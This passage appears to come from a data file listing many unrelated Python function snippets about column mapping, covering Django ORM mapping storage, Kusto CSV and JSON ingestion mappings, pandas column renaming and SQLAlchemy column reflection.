organization)\n for mapping in mappings:\n if isinstance(mapping, dict):\n try:\n column_mapping, _ = ColumnMapping.objects.get_or_create(\n super_organization=organization,\n column_raw__in=mapping['from_column_object'],\n )\n except ColumnMapping.MultipleObjectsReturned:\n _log.debug('ColumnMapping.MultipleObjectsReturned in create_mappings')\n # handle the special edge-case where remove dupes does not get\n # called by ``get_or_create``\n ColumnMapping.objects.filter(\n super_organization=organization,\n column_raw__in=mapping['from_column_object'],\n ).delete()\n\n column_mapping, _ = ColumnMapping.objects.get_or_create(\n super_organization=organization,\n column_raw__in=mapping['from_column_object'],\n )\n\n # Clear out the column_raw and column mapped relationships. -- NL really? history?\n column_mapping.column_raw.clear()\n column_mapping.column_mapped.clear()\n\n # Add all that we got back from the interface back in the M2M rel.\n [column_mapping.column_raw.add(raw_col) for raw_col in\n mapping['from_column_object']]\n if mapping['to_column_object'] is not None:\n [column_mapping.column_mapped.add(dest_col) for dest_col in\n mapping['to_column_object']]\n\n column_mapping.user = user\n column_mapping.save()\n\n cache_column_mapping.append(\n {\n 'from_field': mapping['from_field'],\n 'from_units': mapping.get('from_units'),\n 'to_field': mapping['to_field'],\n 'to_table_name': mapping['to_table_name'],\n }\n )\n else:\n raise TypeError(\"Mapping object needs to be of type dict\")\n\n # save off the cached mappings into the file id that was passed\n if import_file_id:\n from seed.models import ImportFile\n import_file = ImportFile.objects.get(id=import_file_id)\n import_file.save_cached_mapped_columns(cache_column_mapping)\n import_file.save()\n\n return True", "def get_column_mapping(raw_column, organization, attr_name='column_mapped'):\n from seed.utils.mapping import get_table_and_column_names\n\n if not isinstance(raw_column, list):\n column_raw = [raw_column]\n else:\n # NL 12/6/2016 - We should never get here, if we see this then find out why and remove the\n # list. 
Eventually delete this code.\n raise Exception(\"I am a LIST! Which makes no sense!\")\n\n # Should only return one column\n cols = Column.objects.filter(\n organization=organization, column_name__in=column_raw\n )\n\n try:\n previous_mapping = ColumnMapping.objects.get(\n super_organization=organization,\n column_raw__in=cols,\n )\n except ColumnMapping.MultipleObjectsReturned:\n _log.debug(\"ColumnMapping.MultipleObjectsReturned in get_column_mapping\")\n # handle the special edge-case where remove dupes does not get\n # called by ``get_or_create``\n ColumnMapping.objects.filter(super_organization=organization, column_raw__in=cols).delete()\n\n # Need to delete and then just allow for the system to re-attempt the match because\n # the old matches are no longer valid.\n return None\n except ColumnMapping.DoesNotExist:\n _log.debug(\"ColumnMapping.DoesNotExist\")\n return None\n\n column_names = get_table_and_column_names(previous_mapping, attr_name=attr_name)\n\n # Check if the mapping is a one-to-one mapping, that is, there is only one mapping available.\n # As far as I know, this should always be the case because of the MultipleObjectsReturned\n # from above.\n if previous_mapping.is_direct():\n column_names = column_names[0]\n else:\n # NL 12/2/2016 - Adding this here for now as a catch. If we get here, then we have problems.\n raise Exception(\"The mapping returned with not direct!\")\n\n return column_names[0], column_names[1], 100", "def __build_map(self):\n columns = []\n\n for i in range(self.__dimensions):\n columns.append([])\n\n for i in range(self.__dimensions):\n self.map.append(columns)", "def schema_mappings(self):\n pass", "def save_column_mappings(request):\n body = json.loads(request.body)\n import_file = ImportFile.objects.get(pk=body.get('import_file_id'))\n organization = import_file.import_record.super_organization\n mappings = body.get('mappings', [])\n for mapping in mappings:\n dest_field, raw_field = mapping\n if dest_field == '':\n dest_field = None\n\n dest_cols = _column_fields_to_columns(dest_field, organization)\n raw_cols = _column_fields_to_columns(raw_field, organization)\n try:\n column_mapping, created = ColumnMapping.objects.get_or_create(\n super_organization=organization,\n column_raw__in=raw_cols,\n )\n except ColumnMapping.MultipleObjectsReturned:\n # handle the special edge-case where remove dupes doesn't get\n # called by ``get_or_create``\n ColumnMapping.objects.filter(\n super_organization=organization,\n column_raw__in=raw_cols,\n ).delete()\n column_mapping, created = ColumnMapping.objects.get_or_create(\n super_organization=organization,\n column_raw__in=raw_cols,\n )\n\n # Clear out the column_raw and column mapped relationships.\n column_mapping.column_raw.clear()\n column_mapping.column_mapped.clear()\n\n # Add all that we got back from the interface back in the M2M rel.\n [column_mapping.column_raw.add(raw_col) for raw_col in raw_cols]\n if dest_cols is not None:\n [\n column_mapping.column_mapped.add(dest_col)\n for dest_col in dest_cols\n ]\n\n column_mapping.user = request.user\n column_mapping.save()\n\n return {'status': 'success'}", "def applyMapping(self):\n pass", "def _do_mapping(self):\n pass", "def create_deft_table_csv_mappings():\n mappings = list()\n mappings.append(CsvColumnMapping(columnName=\"rownumber\", cslDataType=\"int\", ordinal=0))\n mappings.append(CsvColumnMapping(columnName=\"rowguid\", cslDataType=\"string\", ordinal=1))\n mappings.append(CsvColumnMapping(columnName=\"xdouble\", cslDataType=\"real\", 
ordinal=2))\n mappings.append(CsvColumnMapping(columnName=\"xfloat\", cslDataType=\"real\", ordinal=3))\n mappings.append(CsvColumnMapping(columnName=\"xbool\", cslDataType=\"bool\", ordinal=4))\n mappings.append(CsvColumnMapping(columnName=\"xint16\", cslDataType=\"int\", ordinal=5))\n mappings.append(CsvColumnMapping(columnName=\"xint32\", cslDataType=\"int\", ordinal=6))\n mappings.append(CsvColumnMapping(columnName=\"xint64\", cslDataType=\"long\", ordinal=7))\n mappings.append(CsvColumnMapping(columnName=\"xuint8\", cslDataType=\"long\", ordinal=8))\n mappings.append(CsvColumnMapping(columnName=\"xuint16\", cslDataType=\"long\", ordinal=9))\n mappings.append(CsvColumnMapping(columnName=\"xuint32\", cslDataType=\"long\", ordinal=10))\n mappings.append(CsvColumnMapping(columnName=\"xuint64\", cslDataType=\"long\", ordinal=11))\n mappings.append(CsvColumnMapping(columnName=\"xdate\", cslDataType=\"datetime\", ordinal=12))\n mappings.append(CsvColumnMapping(columnName=\"xsmalltext\", cslDataType=\"string\", ordinal=13))\n mappings.append(CsvColumnMapping(columnName=\"xtext\", cslDataType=\"string\", ordinal=14))\n mappings.append(CsvColumnMapping(columnName=\"xnumberAsText\", cslDataType=\"string\", ordinal=15))\n mappings.append(CsvColumnMapping(columnName=\"xtime\", cslDataType=\"timespan\", ordinal=16))\n mappings.append(CsvColumnMapping(columnName=\"xtextWithNulls\", cslDataType=\"string\", ordinal=17))\n mappings.append(CsvColumnMapping(columnName=\"xdynamicWithNulls\", cslDataType=\"dynamic\", ordinal=18))\n return mappings", "def get_column_to_tags_mapping(\n self, config: cconfig.Config\n ) -> Optional[Dict[Any, List[str]]]:\n _ = self, config\n return None", "def columns(self) -> java.util.Collection:\n ...", "def requires_mapping(self):", "def __init__(self, columns=()):\n self.columns = list(columns)\n\n # Create internal dictionary for faster access\n self.column_dict = {}\n\n for column in self.columns:\n self.column_dict[column.column_id] = column", "def getColumnDictionary(self):\n try:\n column_dictionary = []\n con = self.getMetadataDatabaseConnection()\n column_values = con.cursor()\n con.cursor().callproc('qiime_assets.get_column_dictionary', [column_values])\n for row in column_values:\n # Skip if no column name is found\n if row[0] is None:\n continue\n\n # Some variables to allow for re-assignment should any of them be None\n column_name = row[0].lower()\n expected_values = row[1]\n description = row[2]\n data_type = row[3]\n max_length = row[4]\n min_length = row[5]\n active = row[6]\n \n if row[1] == None:\n expected_values == ''\n elif row[2] == None:\n description == ''\n elif row[3] == None:\n data_type = ''\n elif row[4] == None:\n max_length = ''\n elif row[5] == None:\n min_length = ''\n elif row[6] == None:\n min_length = ''\n \n list_item = (column_name, expected_values, description, data_type, max_length, min_length, active)\n column_dictionary.append(list_item)\n return column_dictionary\n except Exception, e:\n print 'Exception caught: %s.\\nThe error is: %s' % (type(e), e)\n return False", "def mapping(self) -> Dict[str, str]:\n return self._normalizer.get_placeholders()", "def extract_mapping(self) -> DatasetMapping:\n # store fields\n fields = []\n for col in self.data.columns:\n #get field label\n label = col\n #get field type using PANDAS_TYPE (see apps.utils.utils)\n col_type = self.data[col].dtype\n field_type = PANDAS_TYPE[col_type]\n #set field\n field = FieldMapping(label=label, type=field_type)\n fields.append(field)\n 
self.mapping.append(label)\n return DatasetMapping(fields=fields)", "def itermappings(self):\r\n return self.by_target.iteritems()", "def get_special_mappings_df() -> pd.DataFrame:\n return pd.read_csv(SPECIAL_MAPPINGS_PATH, sep='\\t')", "def dimensionizing_mapper(self, names=None):\n\n def fix(string):\n tags = [\n \"'\", '\"', ' ', '&', '.', '/', '-',\n '(', ')', '[', ']', '{', '}'\n ]\n for tag in tags:\n string = string.replace(tag, '_')\n return string\n\n masks = self._meta['masks']\n columns = self._meta['columns']\n suffix = self._dimensions_suffix\n\n if not names: names = self.variables()\n mapper = {}\n for org_mn, mask in masks.items():\n if org_mn in names:\n mask_name = fix(org_mn)\n new_mask_name = '{mn}.{mn}{s}'.format(mn=mask_name, s=suffix)\n mapper[org_mn] = new_mask_name\n\n mask_mapper = 'masks@{mn}'.format(mn=org_mn)\n new_mask_mapper = 'masks@{nmn}'.format(nmn=new_mask_name)\n mapper[mask_mapper] = new_mask_mapper\n\n values_mapper = 'lib@values@{mn}'.format(mn=org_mn)\n new_values_mapper = 'lib@values@{nmn}'.format(nmn=new_mask_name)\n mapper[values_mapper] = new_values_mapper\n\n items = masks[org_mn]['items']\n for i, item in enumerate(items):\n org_cn = item['source'].split('@')[-1]\n col_name = fix(org_cn)\n new_col_name = '{mn}[{{{cn}}}].{mn}{s}'.format(\n mn=mask_name, cn=col_name, s=suffix\n )\n mapper[org_cn] = new_col_name\n\n col_mapper = 'columns@{cn}'.format(cn=org_cn)\n new_col_mapper = 'columns@{ncn}'.format(ncn=new_col_name)\n mapper[col_mapper] = new_col_mapper\n\n for col_name, col in columns.items():\n if col_name in names and not self._is_array_item(col_name):\n new_col_name = fix(col_name)\n if new_col_name == col_name: continue\n mapper[col_name] = new_col_name\n\n col_mapper = 'columns@{cn}'.format(cn=col_name)\n new_col_mapper = 'columns@{ncn}'.format(ncn=new_col_name)\n mapper[col_mapper] = new_col_mapper\n\n return mapper", "def load_columns(self):\n pass", "def get_mappings(embedding):\n n_columns = embedding.shape[1]\n mappings = []\n for i in range(n_columns):\n mappings.append(get_eq_n_intervals(embedding[:, i]))\n return np.array(mappings)", "def getSampleColumnList( platformTarget):\n print(f'columnIndexDict: {columnIndexDict}')\n columnIndex = getColumnIndex(platformTarget, 'Sample')\n print(f' columnIndex:{columnIndex}')\n columnList = []\n for key, val in bltFieldsDict.items():\n columnList.append([key, val[columnIndex]])\n\n return columnList", "def get_columns_after_apply_mapping(self) -> List[str]:\n return self.get_dyf_and_apply_mapping().toDF().columns", "def create_deft_table_json_mappings():\n mappings = list()\n mappings.append(JsonColumnMapping(columnName=\"rownumber\", jsonPath=\"$.rownumber\", cslDataType=\"int\"))\n mappings.append(JsonColumnMapping(columnName=\"rowguid\", jsonPath=\"$.rowguid\", cslDataType=\"string\"))\n mappings.append(JsonColumnMapping(columnName=\"xdouble\", jsonPath=\"$.xdouble\", cslDataType=\"real\"))\n mappings.append(JsonColumnMapping(columnName=\"xfloat\", jsonPath=\"$.xfloat\", cslDataType=\"real\"))\n mappings.append(JsonColumnMapping(columnName=\"xbool\", jsonPath=\"$.xbool\", cslDataType=\"bool\"))\n mappings.append(JsonColumnMapping(columnName=\"xint16\", jsonPath=\"$.xint16\", cslDataType=\"int\"))\n mappings.append(JsonColumnMapping(columnName=\"xint32\", jsonPath=\"$.xint32\", cslDataType=\"int\"))\n mappings.append(JsonColumnMapping(columnName=\"xint64\", jsonPath=\"$.xint64\", cslDataType=\"long\"))\n mappings.append(JsonColumnMapping(columnName=\"xuint8\", jsonPath=\"$.xuint8\", 
cslDataType=\"long\"))\n mappings.append(JsonColumnMapping(columnName=\"xuint16\", jsonPath=\"$.xuint16\", cslDataType=\"long\"))\n mappings.append(JsonColumnMapping(columnName=\"xuint32\", jsonPath=\"$.xuint32\", cslDataType=\"long\"))\n mappings.append(JsonColumnMapping(columnName=\"xuint64\", jsonPath=\"$.xuint64\", cslDataType=\"long\"))\n mappings.append(JsonColumnMapping(columnName=\"xdate\", jsonPath=\"$.xdate\", cslDataType=\"datetime\"))\n mappings.append(JsonColumnMapping(columnName=\"xsmalltext\", jsonPath=\"$.xsmalltext\", cslDataType=\"string\"))\n mappings.append(JsonColumnMapping(columnName=\"xtext\", jsonPath=\"$.xtext\", cslDataType=\"string\"))\n mappings.append(JsonColumnMapping(columnName=\"xnumberAsText\", jsonPath=\"$.xnumberAsText\", cslDataType=\"string\"))\n mappings.append(JsonColumnMapping(columnName=\"xtime\", jsonPath=\"$.xtime\", cslDataType=\"timespan\"))\n mappings.append(\n JsonColumnMapping(columnName=\"xtextWithNulls\", jsonPath=\"$.xtextWithNulls\", cslDataType=\"string\")\n )\n mappings.append(\n JsonColumnMapping(columnName=\"xdynamicWithNulls\", jsonPath=\"$.xdynamicWithNulls\", cslDataType=\"dynamic\")\n )\n return mappings", "def map(self, **names_to_funcs):\n def _mapped_col(name, col):\n if name in names_to_funcs:\n return Column(imap(names_to_funcs[name], col))\n return col\n\n return Document((name, _mapped_col(name, col)) for name, col in self)", "def itermappings(self):\n return six.iteritems(self.by_target)", "def _get_columns(self):\n columns = []\n for column in self.plate_meta['columns']:\n columns.append(column['name'])\n self.columns = columns", "def _retrieve_db_columns():\n\n # Grab the default columns and their details\n hard_coded_columns = copy.deepcopy(VIEW_COLUMNS_PROPERTY)\n\n md = MappingData()\n for c in hard_coded_columns:\n if not md.find_column(c['table'], c['name']):\n print \"Could not find column field in database for {}\".format(c)\n\n return hard_coded_columns", "def templateMappings(self):\n raise NotImplementedError", "def dest_columns(self):\n return self.intersection + self.dest_renames", "def read_mappings(\n cls, mapping_file: Union[str, DataFrame], threshold: float = 0.0\n ) -> List[str]:\n if type(mapping_file) is DataFrame:\n _df = mapping_file\n else:\n _df = pd.read_csv(mapping_file, sep=\"\\t\", na_values=cls.na_vals, keep_default_na=False)\n mappings = [\n \"\\t\".join(_df.iloc[i][:-1]) for i in range(len(_df)) if _df.iloc[i][-1] >= threshold\n ]\n return uniqify(mappings)", "def init_map(data, key_col, data_col, blacklist=None):\n if blacklist:\n return dict([(item[key_col], item[data_col]) \n for item in data if not item[0] in blacklist])\n else:\n return dict([(item[key_col], item[data_col]) for item in data])", "def _columns_are_mapped(self, *cols: ColumnElement[Any]) -> bool:\n\n secondary = self._init_args.secondary.resolved\n for c in cols:\n if secondary is not None and secondary.c.contains_column(c):\n continue\n if not self.parent.persist_selectable.c.contains_column(\n c\n ) and not self.target.c.contains_column(c):\n return False\n return True", "def map_items(self) -> None:\n self.__attribute_columns = list(self.__DataFrame.columns)\n self.__attribute_columns.remove(self.__surv_col_name)\n self.__attribute_columns.remove(self.__status_col_name)\n\n mapped_int = 0\n\n for attribute in self.__attribute_columns:\n for value in self.__DataFrame[attribute].unique():\n item_reference = (attribute, value)\n self.__item_map[item_reference] = mapped_int\n self.items_list.append(item_reference)\n 
mapped_int += 1", "def test_instantiation_with_column_class(self):\r\n column = columns.Map(columns.Text, columns.Integer)\r\n assert isinstance(column.key_col, columns.Text)\r\n assert isinstance(column.value_col, columns.Integer)", "def _get_categorized_columns(tableColumns):\n columns = {}\n columns_ref = {}\n columns_pri = {}\n columns_ignore = {}\n first_pk_col = None\n\n for col_name, col_attrs in tableColumns.iteritems():\n if RuleHandler.STR_SKIP in col_attrs:\n columns_ignore[col_name] = col_attrs\n elif col_attrs['isPk']:\n if first_pk_col is None:\n first_pk_col = col_name\n columns_pri[first_pk_col] = col_attrs\n else:\n col_attrs['isPk'] = False\n columns[col_name] = col_attrs\n\n if first_pk_col in columns_pri:\n columns_pri[first_pk_col]['isPk'] = False\n columns[first_pk_col] = columns_pri[first_pk_col]\n del columns_pri[first_pk_col]\n\n if 'pkC' not in columns_pri:\n columns_pri['pkC'] = copy.copy(col_attrs)\n columns_pri['pkC']['isPkC'] = list([first_pk_col])\n\n columns_pri['pkC']['isPkC'].append(col_name)\n elif col_attrs['reference']:\n columns_ref[col_name] = col_attrs\n else:\n columns[col_name] = col_attrs\n\n return columns_pri, columns_ref, columns, columns_ignore", "def item_col(self):\n if not self.col_name_mapping:\n return []\n item_sparse, item_dense = [], []\n if \"item_sparse_col\" in self.col_name_mapping:\n item_sparse = list(self.col_name_mapping[\"item_sparse_col\"].keys())\n if \"item_dense_col\" in self.col_name_mapping:\n item_dense = list(self.col_name_mapping[\"item_dense_col\"].keys())\n # The result columns will be sorted by key\n return item_sparse + item_dense", "def _get_columns(model):\n return {c.key: c for c in _get_mapper(model).iterate_properties\n if isinstance(c, ColumnProperty)}", "def items(self):\r\n for column in self.table.columns:\r\n yield (column, self[column.name])", "def _column_fields_to_columns(fields, organization):\n\n def select_col_obj(column_name, table_name, organization_column):\n if organization_column:\n return [organization_column]\n else:\n # Try for \"global\" column definitions, e.g. BEDES. - Note the BEDES are not\n # loaded into the database as of 9/8/2016 so not sure if this code is ever\n # exercised\n obj = Column.objects.filter(organization=None, column_name=column_name).first()\n\n if obj:\n # create organization mapped column\n obj.pk = None\n obj.id = None\n obj.organization = organization\n obj.save()\n\n return [obj]\n else:\n if table_name:\n obj, _ = Column.objects.get_or_create(\n organization=organization,\n column_name=column_name,\n table_name=table_name,\n is_extra_data=is_extra_data,\n )\n return [obj]\n else:\n obj, _ = Column.objects.get_or_create(\n organization=organization,\n column_name=column_name,\n is_extra_data=is_extra_data,\n )\n return [obj]\n\n md = MappingData()\n\n # Container to store the dicts with the Column object\n new_data = []\n\n for field in fields:\n new_field = field\n\n # find the mapping data column (i.e. 
the database fields) that match, if it exists\n # then set the extra data flag to true\n db_field = md.find_column(field['to_table_name'], field['to_field'])\n is_extra_data = False if db_field else True # yes i am a db column, thus I am not extra_data\n\n try:\n to_org_col, _ = Column.objects.get_or_create(\n organization=organization,\n column_name=field['to_field'],\n table_name=field['to_table_name'],\n is_extra_data=is_extra_data\n )\n except Column.MultipleObjectsReturned:\n _log.debug(\"More than one to_column found for {}.{}\".format(field['to_table_name'],\n field['to_field']))\n # raise Exception(\"Cannot handle more than one to_column returned for {}.{}\".format(\n # field['to_field'], field['to_table_name']))\n\n # TODO: write something to remove the duplicate columns\n to_org_col = Column.objects.filter(organization=organization,\n column_name=field['to_field'],\n table_name=field['to_table_name'],\n is_extra_data=is_extra_data).first()\n _log.debug(\"Grabbing the first to_column\")\n\n try:\n # the from column is the field in the import file, thus the table_name needs to be\n # blank. Eventually need to handle passing in import_file_id\n from_org_col, _ = Column.objects.get_or_create(\n organization=organization,\n table_name__in=[None, ''],\n column_name=field['from_field'],\n units_pint=field.get('from_units'), # might be None\n is_extra_data=False # data from header rows in the files are NEVER extra data\n )\n except Column.MultipleObjectsReturned:\n _log.debug(\n \"More than one from_column found for {}.{}\".format(field['to_table_name'],\n field['to_field']))\n\n # TODO: write something to remove the duplicate columns\n from_org_col = Column.objects.filter(organization=organization,\n table_name__in=[None, ''],\n column_name=field['from_field'],\n units_pint=field.get('from_units'), # might be None\n is_extra_data=is_extra_data).first()\n _log.debug(\"Grabbing the first from_column\")\n\n new_field['to_column_object'] = select_col_obj(field['to_field'],\n field['to_table_name'], to_org_col)\n new_field['from_column_object'] = select_col_obj(field['from_field'], \"\", from_org_col)\n new_data.append(new_field)\n\n return new_data", "def __init__(self, mappings):\n self.mappings = mappings", "def _map_columns_step(self, op: data_algebra.data_ops_types.OperatorPlatform, *, data_map: Dict[str, Any]):\n if op.node_name != \"MapColumnsNode\":\n raise TypeError(\n \"op was supposed to be a data_algebra.data_ops.MapColumnsNode\"\n )\n res = self._compose_polars_ops(op.sources[0], data_map=data_map)\n if isinstance(res, pl.LazyFrame):\n # work around https://github.com/pola-rs/polars/issues/5882#issue-1507040380\n res = res.collect()\n res = res.rename(op.column_remapping)\n res = res.select(op.columns_produced())\n if self.use_lazy_eval and isinstance(res, pl.DataFrame):\n res = res.lazy()\n return res", "def get_column_mappings_by_table_name(organization):\n\n data, _ = ColumnMapping.get_column_mappings(organization)\n # data will be in format\n # {\n # u'Wookiee': (u'PropertyState', u'Dothraki'),\n # u'Ewok': (u'TaxLotState', u'Hattin'),\n # u'eui': (u'PropertyState', u'site_eui'),\n # u'address': (u'TaxLotState', u'address')\n # }\n\n tables = set()\n for k, v in data.iteritems():\n tables.add(v[0])\n\n # initialize the new container to store the results\n # (there has to be a better way of doing this... 
not enough time)\n container = {}\n for t in tables:\n container[t] = {}\n\n for k, v in data.iteritems():\n container[v[0]][k] = v\n\n # Container will be in the format:\n #\n # container = {\n # u'PropertyState': {\n # u'Wookiee': (u'PropertyState', u'Dothraki'),\n # u'eui': (u'PropertyState', u'site_eui'),\n # },\n # u'TaxLotState': {\n # u'address': (u'TaxLotState', u'address'),\n # u'Ewok': (u'TaxLotState', u'Hattin'),\n # }\n # }\n return container", "def createMappedTableColumn(self, destinationColumn: docking.widgets.table.DynamicTableColumn) -> docking.widgets.table.DynamicTableColumn:\n ...", "def columns(self):\n columns = self.query.get_columns()\n # Adjust any column names which don't match field names\n for query_name, model_name in self.translations.items():\n # Ignore translations for nonexistent column names\n try:\n index = columns.index(query_name)\n except ValueError:\n pass\n else:\n columns[index] = model_name\n return columns", "def getMappingSuggestions(self,dataSetId:str=None,batchId:str=None,excludeUnmapped:bool=True)->dict:\n path = \"/mappingSets/suggestion\"\n params = {\"excludeUnmapped\":excludeUnmapped}\n if dataSetId is not None:\n params['datasetId'] = dataSetId\n if batchId is not None:\n params[\"batchId\"] = batchId\n res = self.connector.getData(self.endpoint+path,params=params)\n return res", "def columns(self):\n return NotImplemented", "def map_column_indexes(self, merge_specification, ingredients):\n last_column = len(ingredients) - 1\n accumulating = {}\n remove = set()\n # default behavior, no column merge\n for column_index in range(0, last_column + 1):\n self.column_index_to_columns[column_index] \\\n = [(column_index, 1.0)]\n \n for columns in merge_specification:\n accumulating_column = columns[0][0]\n if accumulating_column > last_column or accumulating_column < 0:\n raise MergeConfigError(\n \"Attempted to merge missing column %d\" % accumulating_column)\n # specifies which columns should be merged into this one\n accumulating[accumulating_column] = columns\n for column_index, _ in columns[1:]:\n column_index = column_index\n if column_index > last_column or column_index < 0:\n raise MergeConfigError(\n \"Attempted to merge missing column %d\" % column_index) \n # drop this column; it will be merged into another\n remove.add(column_index)\n \n # drop columns first so that any columns both specified as\n # accumulating *and* merged columns do not get dropped\n for column_index in remove:\n self.column_index_to_columns[column_index] = None\n \n for column_index, columns in accumulating.items():\n self.column_index_to_columns[column_index] = columns", "def mappings(self, year=None):\n raise NotImplementedError()", "def map_factory(cls, list_to_alter):\n temp_list = []\n for letter in list_to_alter:\n # Only cell types which are allowed can be transformed\n if letter not in cls.dict_cells.keys():\n raise ValueError(f\"{letter} is not an allowed cell type\")\n temp_list.append(cls.dict_cells[letter]())\n\n return temp_list", "def rename_map_for_dframe(self, dframe):\n labels_to_slugs = self.labels_to_slugs\n\n return {\n column: labels_to_slugs[column] for column in\n dframe.columns.tolist() if self._resluggable_column(\n column, labels_to_slugs, dframe)\n }", "def get_mapping():\n \n import pandas as pd\n data = pd.read_csv('/home/yuheng/Downloads/ADE20K_2016_07_26/objectInfo150.txt',sep='\\t',lineterminator='\\n') \n mapping = {}\n for i in range(150):\n line = data.loc[i]\n mapping[ int(line['Idx']) ] = line['Name']\n \n return mapping", "def 
init_mapping_field_list(\n name_columen: list,\n xdm_one_data_model: list,\n raw_event: dict,\n xdm_rule_to_dtype: dict,\n xdm_rule_to_dclass: dict,\n) -> List[MappingField]:\n mapping_list = []\n xdm_onedata_model_names = xdm_rule_to_dclass.keys()\n for (field_name, xdm_field_name) in zip(name_columen, xdm_one_data_model):\n raw_event_data_list: List[RawEventData] = handle_raw_evnet_data(\n field_name, raw_event\n )\n\n if xdm_field_name not in xdm_onedata_model_names:\n if not xdm_field_name:\n logger.warning(f\"No xdm rule was specified for {field_name}\")\n else:\n raise ValueError(\n f\"No XDM field {xdm_field_name} exists in the onedata model. Please check your modelling rules file.\"\n )\n\n xdm_field_type = xdm_rule_to_dtype.get(xdm_field_name)\n xdm_class_type = xdm_rule_to_dclass.get(xdm_field_name)\n\n mapping_list.append(\n MappingField(\n xdm_rule=xdm_field_name,\n xdm_field_type=xdm_field_type,\n xdm_class_type=xdm_class_type,\n mapped_to_raw=raw_event_data_list,\n )\n )\n\n return mapping_list", "def get_matching_columns(self, columns):\n result = []\n for column in columns:\n if self.match(column):\n result.append(column)\n return result", "def build_rename_mapper_from_df(df, chunk_name_mapper):\n rename_mapper = {}\n for column_name_chunk in chunk_name_mapper:\n for c in df.columns:\n if column_name_chunk in c:\n rename_mapper[c] = c.replace(\n column_name_chunk, chunk_name_mapper[column_name_chunk]\n )\n return rename_mapper", "def test_instantiation_with_column_instance(self):\r\n column = columns.Map(columns.Text(min_length=100), columns.Integer())\r\n assert isinstance(column.key_col, columns.Text)\r\n assert isinstance(column.value_col, columns.Integer)", "def get_columns(self, request, cl):\n columns = []\n for field_name in cl.model_admin.list_display:\n text, _ = label_for_field(field_name, cl.model, model_admin=cl.model_admin, return_attr=True)\n columns.append({field_name: text})\n return columns", "def map_def_classes(self, table):\n definition = MapperDefinition()\n for rc in self.get_table_classes(table):\n splitted = rc.split()\n abbreviation = \" \".join(splitted[:-1])\n course_number = splitted[-1]\n definition.add(abbreviation, allowed=[course_number])\n return definition", "def get_mention_id_mappings(input_file_name, out_file, field_threshold, column_indices):\n out = open(out_file, 'w')\n if input_file_name.endswith('.csv'):\n with open(input_file_name, 'r') as f:\n reader = csv.reader(f)\n for line in reader:\n if len(line) >= field_threshold:\n if not line[0].startswith(\"#\"):\n row = []\n for index in column_indices:\n row.append(line[index])\n out.write(\"|\".join(row) + \"\\n\")\n out.close()", "def branch_mappings(self):\n return self._return_if('_branch_mappings')", "def columns(self):\n return self.__column_list", "def make_columns(options, columns):\n # (ElasticsearchFDWOptions, Dict[str, multicorn.ColumnDefinition]) -> Columns\n columns = columns.copy()\n\n id_column = IdColumn(name=options.rowid_column)\n columns.pop(options.rowid_column, None)\n if options.score_column:\n score_column = ScoreColumn(name=options.score_column)\n del columns[options.score_column]\n else:\n score_column = None\n if options.query_column:\n query_column = options.query_column\n del columns[options.query_column]\n else:\n query_column = None\n if options.sort_column:\n sort_column = options.sort_column\n del columns[options.sort_column]\n else:\n sort_column = None\n\n columns = [make_column(options, name, column) for name, column in columns.items()]\n return 
Columns(\n id_column=id_column,\n score_column=score_column,\n query_column=query_column,\n sort_column=sort_column,\n columns=columns,\n )", "def _columns(cls, schema: dsl.Source.Schema) -> typing.Sequence[str]:\n return tuple(f.name for f in schema)", "def GetColumns(self):\n ret = super().GetColumns()\n ret.append((\"name\",\"text\"))\n return ret", "def mapping_description(self):\n\n mapping_description_lines = []\n\n if self.valuemap:\n for value in sorted(self.valuemap.keys()):\n mapping = self.valuemap[value]\n mapping_description_lines.append(\"'{}' <-> '{}'\\n\".format(value, mapping))\n return mapping_description_lines", "def column_reflection_fallback(self):\n col_info_dict_list: List[Dict]\n if self.sql_engine_dialect.name.lower() == \"mssql\":\n type_module = self._get_dialect_type_module()\n # Get column names and types from the database\n # StackOverflow to the rescue: https://stackoverflow.com/a/38634368\n col_info_query: TextClause = sa.text(\n f\"\"\"\nSELECT\n cols.NAME, ty.NAME\nFROM\n tempdb.sys.columns AS cols\nJOIN\n sys.types AS ty\nON\n cols.user_type_id = ty.user_type_id\nWHERE\n object_id = OBJECT_ID('tempdb..{self._table}')\n \"\"\"\n )\n col_info_tuples_list = self.engine.execute(col_info_query).fetchall()\n col_info_dict_list = [\n {\"name\": col_name, \"type\": getattr(type_module, col_type.upper())()}\n for col_name, col_type in col_info_tuples_list\n ]\n else:\n query: Select = sa.select([sa.text(\"*\")]).select_from(self._table).limit(1)\n col_names: list = self.engine.execute(query).keys()\n col_info_dict_list = [{\"name\": col_name} for col_name in col_names]\n return col_info_dict_list", "def replace_legend_value_mappings(legends, documentation):\r\n col_documentation = documentation.get_column(legends[0])\r\n dtype = col_documentation.column_type\r\n return [col_documentation.description] + \\\r\n [col_documentation.values_mapping[dtype(l)] for l in legends[1:]]", "def get_overrides_columns(self):\n\n if hasattr(self, '_overrides'):\n return list(self._overrides.columns)\n return []", "def list_column(self,\n column_name: str,\n start: int = None,\n end: int = None) -> List:\n return [getattr(i, column_name) for i in self.data[start:end]]", "def _transform_map_data(self):\n WARD_FMT = '%s-%s'\n self.map_data_trans = []\n lookup = {i.column: ''.join(filter(lambda x: x.isdigit(), i.value)) for i in self.sht[1]}\n\n #skip over header\n rs = iter(self.sht.rows)\n next(rs)\n next(rs)\n for r in rs:\n pka = r[0].value\n for c in r[1:]:\n if c.value is None:\n c.value = 0\n\n self.map_data_trans.append((WARD_FMT%(pka, lookup[c.column]), c.value))", "def columns(cls):\n return { col.key: { 'python_type': col.type.python_type,\n 'type': str(col.type),\n 'primary_key': col.primary_key,\n 'default': col.default,\n 'nullable': col.nullable}\n for col in cls.__table__.columns }", "def get_column_class_names(self, classes_set, bound_column):\n cset = super(ColumnShiftTable, self).get_column_class_names(classes_set, bound_column)\n cset.add(bound_column.name)\n return cset", "def undimensionizing_mapper(self, names=None):\n\n masks = self._meta['masks']\n columns = self._meta['columns']\n\n mask_pattern = '(^.+)\\..+$'\n column_pattern = '(?<=\\[{)(.*?)(?=}\\])'\n\n mapper = {}\n if not names:\n names = list(masks.keys()) + list(columns.keys())\n for mask_name in list(masks.keys()):\n if mask_name in names:\n matches = re.findall(mask_pattern, mask_name)\n if matches:\n new_mask_name = matches[0]\n mapper[mask_name] = new_mask_name\n\n mask_mapper = 
